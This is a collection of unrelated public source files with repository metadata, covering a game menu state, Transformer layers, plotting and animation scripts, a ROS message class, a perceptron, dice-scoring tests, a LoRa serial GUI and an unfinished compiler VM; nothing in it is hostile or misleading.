class CreateServerState(EngineState):
def __init__(self, engine):
"""
The game determines what is happening on screen
based on what state the GameEngine instance has.
"""
self.engine = engine
self.screen = Screen()
self.res = self.engine.setsMgr.screenRes
res = self.res # saying 'self.res' was making lines too long. :P
# get/load the font
self.font = FontManager().loadFont( 'JohnDoe' )
# screen objects
self.UI = {}
self.UI['title'] = UIText("Start a Server"\
, pos=[res[0]*.01,res[1]*.10], font=self.font, scale=35)
self.UI['server_name'] = UIText("Server Name"\
, [res[0]*0.3, res[1]*0.2], self.font, 22)
self.UI['text_entry'] = UIText("server_name"\
, [res[0]*0.3, res[1]*0.4], self.font, 30)
self.UI['backspace'] = UIText("BKSP"\
, [res[0]*0.3, res[1]*0.50], self.font, 20)
self.UI['space'] = UIText("SPACE"\
, [res[0]*0.3, res[1]*0.7], self.font, 20)
self.UI['back'] = UIText("Back"\
, pos=[res[0]*0.15, res[1]*0.8], font=self.font, scale=20)
self.UI['create'] = UIText("Create"\
, pos=[res[0]*0.7, res[1]*0.8], font=self.font, scale=20)
# Here, a hash is created containing a UIText for each letter in the alphabet.
# They are spaced and stacked on the screen so that they lie in 3 rows of 8,
# 9, and 9 letters each.
self.screenKeys = {}
lettPos = [res[0]*0.20, res[1]*0.6]
lettersToAdd = 8
lettScale = 18
for letter in map(chr, range(65, 91)):
# add the letter to the hash
self.screenKeys[letter] = UIText(letter, [lettPos[0], lettPos[1]],
self.font, lettScale)
# This denotes that the last letter in the row has been added
#
if lettersToAdd == 1:
lettersToAdd = 9 # the subsequent rows all have 9 letters
lettPos[0] = res[0]*0.17 # reset the x pos (slightly less ^\ )
lettPos[1] += lettScale+1 # increment the y pos
else:
lettersToAdd -= 1 # decrement the counter
lettPos[0] += lettScale+1 # increment the x pos
def renderFrame(self):
""" RenderFrame - Base Class """
#screen = Screen()
for scrObj in self.UI.values():
Screen().drawThis( scrObj )
for letter in self.screenKeys.values():
Screen().drawThis( letter )
return self
def on_key_press(self, key, x, y):
"""
On key press
"""
print key
if key == '\x1b':
return TitleScreenState(self.engine)
return self
def on_key_release(self, key, x, y):
"""
On key release
"""
return self
def on_mouse_motion(self, x, y):
"""
On mouse motion
"""
return self
def on_mouse(self, button, state, x, y):
"""
On mouse press
"""
if button == GLUT_LEFT_BUTTON and state == GLUT_UP:
if self.UI['back'].CollidePoint((x,y)):
return TitleScreenState(self.engine)
if self.UI['create'].CollidePoint((x,y)):
if system() == "Linux" or system() == "Macintosh":
Popen( [r'/usr/bin/python/python'
,os.path.join( self.engine.setsMgr.home_dir
, 'StartServer.py' )] )
elif system() == "Windows":
Popen([r'C:\Python25\python.exe'
,os.path.join( self.engine.setsMgr.home_dir
, 'StartServer.py' )])
else:
print "you are on an unsupported platform for spawning a server"
# declare that this game instance is the server owner
self.engine.serverOwner = True
# test for user clicks on the screen keys
for letter in self.screenKeys:
if self.screenKeys[letter].CollidePoint((x,y)):
self.UI['text_entry'].push( letter )
if self.UI['backspace'].CollidePoint((x,y)):
self.UI['text_entry'].pop()
if self.UI['space'].CollidePoint((x,y)):
self.UI['text_entry'].push(" ")
return self
def on_socket(self, elapsed):
"""
On socket
"""
return self
def Step(self):
"""
Step
"""
pass
|
[
"thatsamorais@mail.com"
] |
thatsamorais@mail.com
|
8a50e6af62d2494ac3fcea05f063f3807d33eba5
|
4758708f1655f795075669e9a0fdf84041592548
|
/Layers.py
|
a70c1a2a0ce27760d34f327073fdb849ed5c7541
|
[
"Apache-2.0"
] |
permissive
|
SamLynnEvans/Transformer
|
4a6a009c3544ea2a14e320f48cd38d6f00e86944
|
49e01800aab01dcd83403a056c059f429a7d7512
|
refs/heads/master
| 2023-05-25T20:04:07.244922
| 2023-05-19T10:22:41
| 2023-05-19T10:22:41
| 149,262,160
| 1,236
| 381
|
Apache-2.0
| 2023-05-19T10:22:43
| 2018-09-18T09:25:13
|
Python
|
UTF-8
|
Python
| false
| false
| 1,741
|
py
|
import torch
import torch.nn as nn
from Sublayers import FeedForward, MultiHeadAttention, Norm
class EncoderLayer(nn.Module):
def __init__(self, d_model, heads, dropout=0.1):
super().__init__()
self.norm_1 = Norm(d_model)
self.norm_2 = Norm(d_model)
self.attn = MultiHeadAttention(heads, d_model, dropout=dropout)
self.ff = FeedForward(d_model, dropout=dropout)
self.dropout_1 = nn.Dropout(dropout)
self.dropout_2 = nn.Dropout(dropout)
def forward(self, x, mask):
x2 = self.norm_1(x)
x = x + self.dropout_1(self.attn(x2,x2,x2,mask))
x2 = self.norm_2(x)
x = x + self.dropout_2(self.ff(x2))
return x
# build a decoder layer with two multi-head attention layers and
# one feed-forward layer
class DecoderLayer(nn.Module):
def __init__(self, d_model, heads, dropout=0.1):
super().__init__()
self.norm_1 = Norm(d_model)
self.norm_2 = Norm(d_model)
self.norm_3 = Norm(d_model)
self.dropout_1 = nn.Dropout(dropout)
self.dropout_2 = nn.Dropout(dropout)
self.dropout_3 = nn.Dropout(dropout)
self.attn_1 = MultiHeadAttention(heads, d_model, dropout=dropout)
self.attn_2 = MultiHeadAttention(heads, d_model, dropout=dropout)
self.ff = FeedForward(d_model, dropout=dropout)
def forward(self, x, e_outputs, src_mask, trg_mask):
x2 = self.norm_1(x)
x = x + self.dropout_1(self.attn_1(x2, x2, x2, trg_mask))
x2 = self.norm_2(x)
x = x + self.dropout_2(self.attn_2(x2, e_outputs, e_outputs, \
src_mask))
x2 = self.norm_3(x)
x = x + self.dropout_3(self.ff(x2))
return x
|
[
"samuellynnevans@gmail.com"
] |
samuellynnevans@gmail.com
|
af83b8df9d6ed2c308afc29ae1eb3741fdd3ba6e
|
efa88ab827502ecf7143d8564839cce9945987b3
|
/comparison/plotter/plot_single_method.py
|
6900e44609a9a3f2b22a58f104a1f28fcc51690a
|
[
"MIT"
] |
permissive
|
morrislab/pairtree
|
678bf2b2c2fdb06900e03de4cea2d1ef5e08f641
|
1e01dc9ccbd15146de9184bd9d7b5d690cf0fd89
|
refs/heads/master
| 2023-07-27T11:42:37.237423
| 2023-07-18T00:05:43
| 2023-07-18T00:05:43
| 140,898,706
| 32
| 11
|
MIT
| 2023-03-02T21:45:51
| 2018-07-13T22:41:39
|
Python
|
UTF-8
|
Python
| false
| false
| 3,213
|
py
|
import argparse
import numpy as np
import sys
import os
sys.path.append(os.path.join(os.path.dirname(__file__), '..'))
import plotter
from plotter import MISSING
import pandas as pd
def make_score_traces(results, method):
S_vals = sorted(pd.unique(results['S']))
traces = []
for S in S_vals:
points = [(row['K'], row[method]) for idx, row in results.iterrows() \
if row[method] != MISSING and row['S'] == S]
if len(points) == 0:
continue
points = sorted(points, key = lambda V: V[0])
X, Y = zip(*points)
X = ['%s subclones' % K for K in X]
trace = {
'type': 'box',
'x': X,
'y': Y,
'legendgroup': str(S),
'name': '%s samples' % S,
'boxmean': True,
}
traces.append(trace)
return traces
def make_completion_traces(results, method):
S_vals = sorted(pd.unique(results['S']))
K_vals = sorted(pd.unique(results['K']))
traces = []
for S in S_vals:
prop_missing = {}
for K in K_vals:
total = len([
row for idx, row in results.iterrows() \
if row['K'] == K \
and row['S'] == S
])
if total == 0:
continue
complete = len([
row for idx, row in results.iterrows() \
if row[method] != MISSING \
and row['K'] == K \
and row['S'] == S
])
missing = total - complete
prop_missing[K] = missing / total
if len(prop_missing) == 0:
continue
K_sorted = sorted(prop_missing.keys())
X = ['%s subclones' % K for K in K_sorted]
Y = [100*prop_missing[k] for k in K_sorted]
traces.append({
'type': 'bar',
'x': X,
'y': Y,
'name': '%s samples' % S,
})
return traces
def main():
parser = argparse.ArgumentParser(
description='LOL HI THERE',
formatter_class=argparse.ArgumentDefaultsHelpFormatter
)
parser.add_argument('--template', default='seaborn')
parser.add_argument('--max-y')
parser.add_argument('--score-type', required=True, choices=('mutrel', 'mutphi', 'mutdistl1', 'mutdistl2'))
parser.add_argument('--baseline')
parser.add_argument('results_fn')
parser.add_argument('method')
parser.add_argument('plot_fn')
args = parser.parse_args()
results, methods = plotter.load_results(args.results_fn)
plot_type = 'box'
plotter.munge(results, methods, args.baseline)
for key in ('K', 'S'):
results = plotter.augment(results, key)
score_traces = make_score_traces(results, args.method)
completion_traces = make_completion_traces(results, args.method)
figs = {
f'scores_{args.method}': plotter.make_fig(
score_traces,
args.template,
plotter.make_score_ytitle(args.score_type, args.plot_fn),
args.max_y,
log_y_axis = False,
layout_options = {
'boxmode': 'group',
'violinmode': 'overlay',
'violingap': 0.0,
'violingroupgap': 0.0,
},
),
f'completion_{args.method}': plotter.make_fig(
completion_traces,
args.template,
'Failure rate',
100,
log_y_axis = False,
layout_options = {
'barmode': 'group',
},
),
}
plotter.write_figs(figs, args.plot_fn)
if __name__ == '__main__':
main()
|
[
"jeff.git@wintersinger.com"
] |
jeff.git@wintersinger.com
|
7f8c820fb39fbccf368636870997d3dc022fec49
|
194db7eb2ffb075712832a55eeecfcbbb6c05def
|
/devel/lib/python2.7/dist-packages/melle/msg/_SensorData.py
|
c68f7448e09bc1f8eb01fa5c8a03ef4179e035a5
|
[] |
no_license
|
LitterBot2017/MellERos
|
ef7acd720ab0cf60165f64b079eaf3009c492366
|
0fc6af1d21b9e4716fd0efaaadf39aa62a53220b
|
refs/heads/master
| 2020-01-23T21:43:48.445142
| 2016-11-24T15:12:15
| 2016-11-24T15:12:15
| 74,683,802
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,239
|
py
|
# This Python file uses the following encoding: utf-8
"""autogenerated by genpy from melle/SensorData.msg. Do not edit."""
import sys
python3 = True if sys.hexversion > 0x03000000 else False
import genpy
import struct
class SensorData(genpy.Message):
_md5sum = "ac7363d784144c7402ac7de3955b5772"
_type = "melle/SensorData"
_has_header = False #flag to mark the presence of a Header object
_full_text = """int8 binFullness
int8 batteryLevel
int8 signalStrength
float64 latitude
float64 longitude
"""
__slots__ = ['binFullness','batteryLevel','signalStrength','latitude','longitude']
_slot_types = ['int8','int8','int8','float64','float64']
def __init__(self, *args, **kwds):
"""
Constructor. Any message fields that are implicitly/explicitly
set to None will be assigned a default value. The recommend
use is keyword arguments as this is more robust to future message
changes. You cannot mix in-order arguments and keyword arguments.
The available fields are:
binFullness,batteryLevel,signalStrength,latitude,longitude
:param args: complete set of field values, in .msg order
:param kwds: use keyword arguments corresponding to message field names
to set specific fields.
"""
if args or kwds:
super(SensorData, self).__init__(*args, **kwds)
#message fields cannot be None, assign default values for those that are
if self.binFullness is None:
self.binFullness = 0
if self.batteryLevel is None:
self.batteryLevel = 0
if self.signalStrength is None:
self.signalStrength = 0
if self.latitude is None:
self.latitude = 0.
if self.longitude is None:
self.longitude = 0.
else:
self.binFullness = 0
self.batteryLevel = 0
self.signalStrength = 0
self.latitude = 0.
self.longitude = 0.
def _get_types(self):
"""
internal API method
"""
return self._slot_types
def serialize(self, buff):
"""
serialize message into buffer
:param buff: buffer, ``StringIO``
"""
try:
_x = self
buff.write(_struct_3b2d.pack(_x.binFullness, _x.batteryLevel, _x.signalStrength, _x.latitude, _x.longitude))
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
def deserialize(self, str):
"""
unpack serialized message in str into this message instance
:param str: byte array of serialized message, ``str``
"""
try:
end = 0
_x = self
start = end
end += 19
(_x.binFullness, _x.batteryLevel, _x.signalStrength, _x.latitude, _x.longitude,) = _struct_3b2d.unpack(str[start:end])
return self
except struct.error as e:
raise genpy.DeserializationError(e) #most likely buffer underfill
def serialize_numpy(self, buff, numpy):
"""
serialize message with numpy array types into buffer
:param buff: buffer, ``StringIO``
:param numpy: numpy python module
"""
try:
_x = self
buff.write(_struct_3b2d.pack(_x.binFullness, _x.batteryLevel, _x.signalStrength, _x.latitude, _x.longitude))
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
def deserialize_numpy(self, str, numpy):
"""
unpack serialized message in str into this message instance using numpy for array types
:param str: byte array of serialized message, ``str``
:param numpy: numpy python module
"""
try:
end = 0
_x = self
start = end
end += 19
(_x.binFullness, _x.batteryLevel, _x.signalStrength, _x.latitude, _x.longitude,) = _struct_3b2d.unpack(str[start:end])
return self
except struct.error as e:
raise genpy.DeserializationError(e) #most likely buffer underfill
_struct_I = genpy.struct_I
_struct_3b2d = struct.Struct("<3b2d")
|
[
"nrahnemoon@gmail.com"
] |
nrahnemoon@gmail.com
|
4c208fd5282b81d62de3cd7ac8fcd3f13139fd78
|
02adeee0e6b0457fa3dc171a96d7dae9558d8047
|
/pocket-learning-algorithm-and-feature-engineering/perceptron_classifier.py
|
dfa58c902dc0c0650e6f4c250e83e5c5601e0e16
|
[
"Apache-2.0"
] |
permissive
|
pfvaldez/blog-post
|
7d19456ad03984e4729f19bb075efdcf10ca18d3
|
ab159bb44ed57e73c7467197f7adec6e30b4dbc0
|
refs/heads/master
| 2020-04-04T13:12:07.636645
| 2018-02-13T04:03:36
| 2018-02-13T04:03:36
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,139
|
py
|
import numpy as np
class PerceptronClassifier:
'''Preceptron Binary Classifier uses Perceptron Learning Algorithm
to classify two classes data.
Parameters
----------
number_of_attributes: int
The number of attributes of the data set.
class_labels: tuple of the class labels
The class labels can be anything as long as it has only two types of labels.
Attributes
----------
weights: list of float
The list of weights corresponding input attributes.
misclassify_record: list of int
The number of misclassification for each training sample.
'''
def __init__(self, number_of_attributes: int, class_labels: ()):
# Initialize the weights to zero
# The size is the number of attributes plus the bias, i.e. x_0 * w_0
self.weights = np.zeros(number_of_attributes + 1)
# Record of the number of misclassify for each training sample
self.misclassify_record = []
# Build the label map to map the original labels to numerical labels
# For example, ['a', 'b'] -> {0: 'a', 1: 'b'}
self._label_map = {1: class_labels[0], -1: class_labels[1]}
self._reversed_label_map = {class_labels[0]: 1, class_labels[1]: -1}
def _linear_combination(self, sample):
'''linear combination of sample and weights'''
return np.inner(sample, self.weights[1:])
def train(self, samples, labels, max_iterator=10):
'''Train the model
Parameters
----------
samples: two dimensions list
Training data set
labels : list of labels
The class labels of the training data
max_iterator: int
The max iterator to stop the training process
in case the training data is not converaged.
'''
# Transfer the labels to numerical labels
transferred_labels = [self._reversed_label_map[index] for index in labels]
for _ in range(max_iterator):
misclassifies = 0
for sample, target in zip(samples, transferred_labels):
linear_combination = self._linear_combination(sample)
update = target - np.where(linear_combination >= 0.0, 1, -1)
# use numpy.multiply to multiply element-wise
self.weights[1:] += np.multiply(update, sample)
self.weights[0] += update
# record the number of misclassification
misclassifies += int(update != 0.0)
if misclassifies == 0:
break
self.misclassify_record.append(misclassifies)
def classify(self, new_data):
'''Classify the sample based on the trained weights
Parameters
----------
new_data: two dimensions list
New data to be classified
Return
------
List of int
The list of predicted class labels.
'''
predicted_result = np.where((self._linear_combination(new_data) + self.weights[0]) >= 0.0, 1, -1)
return [self._label_map[item] for item in predicted_result]
|
[
"sincerelygre@gmail.com"
] |
sincerelygre@gmail.com
|
5dcf74e6b7075574c4fa4ad254c1cb46edf34366
|
3180e0da3ae6f3e2f13e1846aaa9fdb52cc6f5da
|
/IPL_Wins_Top_5_Race.py
|
fd76af0ea159a58d1614005223592b3f6501b71b
|
[] |
no_license
|
rg089/ipl_wins_bar_race
|
a49e8e87a093810962496a0182d307939c7b10fb
|
a882928a2b3726b77592ede78055bd6322320d12
|
refs/heads/master
| 2023-02-20T17:56:06.819204
| 2021-01-21T21:02:03
| 2021-01-21T21:02:03
| 280,247,765
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,898
|
py
|
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
import datetime
import matplotlib.animation as animation
df=pd.read_csv("ipl_matches.csv", usecols=[3,10])
df.dropna(inplace=True)
df.replace({"Delhi Daredevils":"Delhi Capitals","Rising Pune Supergiant":"Rising Pune Supergiants"}, inplace=True)
d={}; di={}
for s in df["winner"].unique():
d[s]="".join([i[0] for i in s.split()])
d["Sunrisers Hyderabad"]="SRH"; d["Kings XI Punjab"]="KXIP"; d["Deccan Chargers"]="DCH" #Changing the exceptions
for i in d:
di[d[i]]=i
df["winner"]=df["winner"].apply(lambda x: d[x])
colors=dict(zip(d.values(), ["orangered", "#d11d9b", "#2e0854", "darkgrey", "#ec1c24", "#0e74e8", "deeppink", "#e04f16", "#e3c612", "#004ba0", "#d9e3ef", "#c0d6eb", "#ec1c24","#632b72"]))
def datetimeconverter(s):
if "-" in s:
return datetime.datetime.strptime(s,"%Y-%m-%d")
return datetime.datetime.strptime(s, "%d/%m/%y")
df["date"]=df["date"].apply(datetimeconverter)
df.sort_values("date", inplace = True)
df["date"]=df["date"].apply(lambda x: x.strftime("%d %b %Y"))
ind=df["date"].values #The value of the dates
df1=pd.get_dummies(df['winner']).cumsum() #Get the other teams wins as a dataframe with the team as column
df=pd.concat([df, df1], axis=1).drop_duplicates(subset=["date"], keep="last") #Joining the dataframes and dropping the duplicate dates (when 2 matches happened on the ame date)
df.set_index("date", inplace=True) #Setting the index as the date.
df.drop(columns="winner", inplace=True)
def get_data_for_date(date):
s=df.loc[date].nlargest()[::-1]
return s
def plotting(date):
x=get_data_for_date(date)
plt.clf()
ax=plt.gca()
fig=plt.gcf()
plt.barh(x.index, x.values, color=[colors[i] for i in x.index])
plt.box(False)
ax.xaxis.set_ticks_position('top')
ax.set_axisbelow(True)
plt.yticks([])
ax.tick_params(axis='x', colors='#777777', labelsize=10)
ax.grid(which='major', axis='x', linestyle='--')
for i in range(len(x.index)):
if x.values[i]==0:
continue
dx=x.values[i]/30
plt.text(x.values[i]-dx, i, x.index[i], ha="right", size=15, weight=900, va="bottom", color="white")
plt.text(x.values[i]+dx, i, x.values[i], ha="left", size=15, weight=560, va="center")
plt.text(x.values[i]-dx, i-0.25, di[x.index[i]], ha="right", size=13, weight=350, va="baseline", color="snow")
ax.text(0, 5.1, 'Most Wins in IPL', size=28, weight=600, ha='left')
fig.text(0.5, 0.04, date, size=22, ha="center")
fig.text(0.87, 0.096, "Made by Rishabh Gupta", ha="right", c="#777777")
fig.text(0.87, 0.075, "https://github.com/rg089", ha="right", c="#777777")
fig=plt.figure(figsize=(8,8))
animator = animation.FuncAnimation(fig, plotting, frames=ind)
animator.save("IPL_Wins_Top_5_Race.gif", writer=animation.PillowWriter(fps=18))
|
[
"66423362+rg089@users.noreply.github.com"
] |
66423362+rg089@users.noreply.github.com
|
7b2c473cc8869fe66d9c7d17090e41aa07816a89
|
2e2494148f19a2f51383a7eb8853c746a60b6db9
|
/.~c9_invoke_V8Eohz.py
|
80355ec7ba33f36765d6f45bd316877de84e796c
|
[] |
no_license
|
GrimaldoMike/Compiladores
|
a79614d77ac9baed3837d76ccfa70f664b62b3ee
|
2d01512b537f523d608d79e91ec163ee7e2ab529
|
refs/heads/master
| 2021-01-10T17:40:55.376425
| 2016-05-06T20:23:58
| 2016-05-06T20:23:58
| 53,536,738
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,213
|
py
|
import sys
from executable.py import output_quadruples
functions = output_quadruples['funcs']
instructions = output_quadruples['quadruples']
constants = output_quadruples['constants']
globalvars = output_quadruples['globals']
fcinstucts = output_quadruples['fightcomp']
#Stacks que utiliza la VM
slocal = []
sglobal = []
stemp = []
stempglobal = []
execstack = []
paramstack = []
params = []
current_address = 0
current_func_ID = 'main'
stackpos = 'main'
#stack = []
# OP_EOP = "00"
# OP_EOI = "01"
# OP_PUSH = "02"
# OP_POP = "03"
# OP_PRINT = "04"
# OP_ADD = "05"
# OP_SUB = "06"
# OP_MUL = "07"
# OP_DIV = "08"
def load_program(argv):
f = open(argv)
lines = f.read().replace("\n", " ")
lines = lines.split(" ")
f.close()
return lines
def parameterAction(value, functionID):
p
def do_PUSH(i, l):
topush = int(l[i + 1], 16)
#stack.append(topush)
def do_POP():
#stack.pop()
pass
def do_PRINT(stack):
print (stack[-1])
def do_ADD(stack):
num1 = stack.pop()
num2 = stack.pop()
total = num1 + num2
stack.append(total)
def do_SUB(stack):
num1 = stack.pop()
num2 = stack.pop()
total = num1 - num2
stack.append(total)
def do_MUL(stack):
num1 = stack.pop()
num2 = stack.pop()
total = num1 * num2
stack.append(total)
def do_DIV(stack):
num1 = stack.pop()
num2 = stack.pop()
total = num2 / num1
stack.append(total)
def execute_program(l):
loop = len(instructions)
i = 0
while i < loop:
#instruction = l[i] #l son los diccionarios
what_do = instructions[i]
if what_do[i][0] == 'GOTO':
i = what_do[i][3] - 1
print ("GOTO encontrado; cambiando de posicion...")
elif what_do[i][0] == 'GOTOF':
condition = getValueFromMemory(what_do[i][1])
if not condition:
print ("Cambiando de posicion...")
print ("Cambiando de posicion...")
#cosas para desplegar...
elif what_do[i][0] == 'INPUT':
pass
elif what_do[i][0] == 'OUTPUT':
print ("Printing to console " + getValueFromMemory( what_do[i][3] ) )
elif what_do[i][0] == 'GOSUB':
pass
elif what_do[i][0] == 'RETURN':
pass
elif what_do[i][0] == 'ENDPROC':
pass
elif what_do[i][0] == 'ERA':
pass
#expandActivationRecord <<----- niggawhat?
elif what_do[i][0] == 'PARAMETER':
value = getValueFromMemory(what_do[i][1])
parameterAction(value, what_do[i][3])
elif what_do[i][0] == 'END':
exit(0)
elif what_do[i][0] == '+':
op1 = getValueFromMemory(what_do[i][1])
op2 = getValueFromMemory(what_do[i][2])
setValueInMemory(op1 + op2, what_do[i][3])
print (getValueFromMemory(what_do[i][3]))
elif what_do[i][0] == '-':
op1 = getValueFromMemory(what_do[i][1])
op2 = getValueFromMemory(what_do[i][2])
setValueInMemory(op1 - op2, what_do[i][3])
print (getValueFromMemory(what_do[i][3]))
elif what_do[i][0] == '*':
op1 = getValueFromMemory(what_do[i][1])
op2 = getValueFromMemory(what_do[i][2])
setValueInMemory(op1 * op2, what_do[i][3])
print (getValueFromMemory(what_do[i][3]))
elif what_do[i][0] == '/':
op1 = getValueFromMemory(what_do[i][1])
op2 = getValueFromMemory(what_do[i][2])
setValueInMemory(op1 / op2, what_do[i][3])
print (getValueFromMemory(what_do[i][3]))
elif what_do[i][0] == '<':
op1 = getValueFromMemory(what_do[i][1])
op2 = getValueFromMemory(what_do[i][2])
setValueInMemory(op1 < op2, what_do[i][3])
print (getValueFromMemory(what_do[i][3]))
elif what_do[i][0] == '>':
op1 = getValueFromMemory(what_do[i][1])
op2 = getValueFromMemory(what_do[i][2])
setValueInMemory(op1 > op2, what_do[i][3])
print (getValueFromMemory(what_do[i][3]))
elif what_do[i][0] == '<=':
op1 = getValueFromMemory(what_do[i][1])
op2 = getValueFromMemory(what_do[i][2])
setValueInMemory(op1 <= op2, what_do[i][3])
print (getValueFromMemory(what_do[i][3]))
elif what_do[i][0] == '>=':
op1 = getValueFromMemory(what_do[i][1])
op2 = getValueFromMemory(what_do[i][2])
setValueInMemory(op1 >= op2, what_do[i][3])
print (getValueFromMemory(what_do[i][3]))
i+=1
def run_program(argv):
l = load_program(argv)
execute_program(l)
def main(argv):
run_program(argv[1])
return 0
def target(*args):
return main, None
if __name__ == '__main__':
main(sys.argv)
|
[
"grimaldo.mike@hotmail.com"
] |
grimaldo.mike@hotmail.com
|
2195320584a9e644c934183aa90b966842d820ea
|
e2fbdc948b1515a92f5d7f7ee94762072b20f536
|
/test_game_of_greed.py
|
83a7c75d6ac4697fbcb24ba88bfea6e08ddec9e0
|
[
"MIT"
] |
permissive
|
ravewillow6383/game-of-greed
|
063930e25300832d376d03c1b8d86302eb7187f4
|
9c28b44510e5b2ad3627f8c5c8721a86f40555c8
|
refs/heads/master
| 2022-07-11T22:48:18.415213
| 2022-06-03T04:31:03
| 2022-06-03T04:31:03
| 195,851,210
| 0
| 0
|
MIT
| 2022-06-03T04:31:04
| 2019-07-08T16:41:08
|
Python
|
UTF-8
|
Python
| false
| false
| 1,834
|
py
|
from game_of_greed import tally_score
def test_single_one():
assert tally_score('1') == 100
assert tally_score('11') == 200
assert tally_score('111') == 1000
assert tally_score('1111') == 2000
assert tally_score('11111') == 3000
assert tally_score('111111') == 4000
def test_various_twos():
assert tally_score('222') == 200
assert tally_score('2222') == 400
assert tally_score('22222') == 600
assert tally_score('222222') == 800
def test_various_threes():
assert tally_score('333') == 300
assert tally_score('3333') == 600
assert tally_score('33333') == 900
assert tally_score('333333') == 1200
def test_various_fours():
assert tally_score('444') == 400
assert tally_score('4444') == 800
assert tally_score('44444') == 1200
assert tally_score('444444') == 1600
def test_various_fives():
assert tally_score('5') == 50
assert tally_score('55') == 100
assert tally_score('555') == 500
assert tally_score('5555') == 1000
assert tally_score('55555') == 1500
assert tally_score('555555') == 2000
def test_various_sixes():
assert tally_score('666') == 600
assert tally_score('6666') == 1200
assert tally_score('66666') == 1800
assert tally_score('666666') == 2400
def test_zilch():
assert tally_score('2') == 0
assert tally_score('22') == 0
assert tally_score('3') == 0
assert tally_score('33') == 0
assert tally_score('4') == 0
assert tally_score('44') == 0
assert tally_score('6') == 0
assert tally_score('66') == 0
def test_straight():
assert tally_score('123456') == 1500
def test_three_pairs():
assert tally_score('112233') == 1000
assert tally_score('334455') == 1000
assert tally_score('662233') == 1000
|
[
"ravewillow6383@gmail.com"
] |
ravewillow6383@gmail.com
|
59a14ab9adc1063b789ed8e447754c8cf41b2ee5
|
35c95a923a673f226d88e0cfa217c8a381e036f2
|
/reception/GUI.py
|
1d3d5c3ce64425ad3a554b82e80f1d55d0849ad7
|
[
"MIT"
] |
permissive
|
XeBasTeX/LoRa-Transmitter
|
890ed7d46cb84f02a05e87c432f14bb9fa4aaad5
|
3b996f032acf8bb9e031e65964bb10bc35f4dd03
|
refs/heads/master
| 2020-04-13T09:25:23.481698
| 2019-07-05T09:29:57
| 2019-07-05T09:29:57
| 163,111,259
| 0
| 0
| null | 2019-01-18T22:10:24
| 2018-12-25T21:01:30
|
Python
|
UTF-8
|
Python
| false
| false
| 2,945
|
py
|
from tkinter import ttk
from tkinter import *
from tkinter.scrolledtext import ScrolledText
from threading import *
from random import *
import numpy as np
import time
import queue
import serial
import os
import csv
class FenPrincipale(Tk):
def __init__(self):
Tk.__init__(self)
self.title('LoRa recepteur')
self.com = ComSerial
self.nb = ttk.Notebook(self)
mainpage = ttk.Frame(self.nb)
setpage = ttk.Frame(self.nb)
getpage = ttk.Frame(self.nb)
self.nb.add(mainpage, text='Main')
self.nb.add(setpage, text='Set')
self.nb.add(getpage, text='Get')
self.nb.pack(expand=1, fill="both")
self.mainloop()
class ComSerial():
def __init__(self):
self.__portCOM = 'COM4'
self.__bRate = 57600
self.__timeOut = 500
self.__ser = serial.Serial(self.__portCOM, self.__bRate, timeout = self.__timeOut)
self.__bool = True
self.__rcvd = ""
def startSerial(self):
self.__ser = serial.Serial(self.__portCOM, self.__bRate, self.__timeOut)
def stopSerial(self):
self.__ser.close()
def cmdLoRa(self, cmd):
print(cmd)
self.__ser.write(cmd.encode())
print(self.__ser.readline())
def setMod(self, mode): #verified
if mode == 'lora' :
self.cmdLoRa('radio set mod lora\r\n')
elif mode == 'fsk' :
self.cmdLoRa('radio set mod fsk\r\n')
def setFreq(self, freq): #verified
self.cmdLoRa('radio set freq '+str(freq)+'\r\n')
def setSf(self, sf): #verified
self.cmdLoRa('radio set sf sf'+str(sf)+'\r\n')
def setBw(self, bw): #verified
self.cmdLoRa('radio set bw '+str(bw)+'\r\n')
def setPwr(self, pwr): #verified
self.cmdLoRa('radio set pwr '+str(pwr)+'\r\n')
def setCrc(self, crc): #verified
if crc == True:
self.cmdLoRa('radio set crc on\r\n')
else:
self.cmdLoRa('radio set crc off\r\n')
def setPrlen(self, prlen): #verified
self.cmdLoRa('radio set prlen '+str(prlen)+'\r\n')
def setBitrate(self, br): #verified
self.cmdLoRa('radio set bitrate '+str(br)+'\r\n')
def setWdt(self, wdt): #verified
self.cmdLoRa('radio set wdt '+str(wdt)+'\r\n')
def startReceive(self):
while self.__bool:
self.cmdLoRa('radio rx 0\r\n')
self.__rcvd = self.__ser.readline()
print("reception terminee")
def stopReceive(self):
self.__bool = False
#fen = FenPrincipale()
#fen.mainloop()
|
[
"noreply@github.com"
] |
XeBasTeX.noreply@github.com
|
959657251e322e467e7097cb2319c6def544f23e
|
30e0d9704e4c13bb18cb59a7f00306f2f5445a37
|
/venv/lib/python2.7/linecache.py
|
e513e537459a062f304b150efe40eba9b97d3e59
|
[] |
no_license
|
olwflynn/birdplane
|
799c9e227deaaf8487aac1bb3349cd1003684120
|
34348a5679624488a94410ea18811d6282479d49
|
refs/heads/master
| 2021-05-05T02:18:56.999142
| 2018-06-08T11:53:33
| 2018-06-08T11:53:33
| 119,728,295
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 49
|
py
|
/Users/OFlynn/anaconda/lib/python2.7/linecache.py
|
[
"oliver.flynn1989@gmail.com"
] |
oliver.flynn1989@gmail.com
|
b06cca6b5200a5c0eaab11a13f3c215ba2a91bf9
|
b2a6a8733f588d503e45ad40cfa2080566d1ccf5
|
/0x0F-python-object_relational_mapping/7-model_state_fetch_all.py
|
88b7388329651bf8e3ad56794f64494b765ed393
|
[] |
no_license
|
andresvanegas19/holbertonschool-higher_level_programming
|
9cd0f83722623ca08c6b4e3aa94975363b569183
|
aa967a51183c3c8b9c9b27b47199c70fd6241485
|
refs/heads/master
| 2022-12-22T18:44:17.839861
| 2020-09-25T04:54:18
| 2020-09-25T04:54:18
| 259,396,114
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,067
|
py
|
#!/usr/bin/python3
"""Start link class to table in database
"""
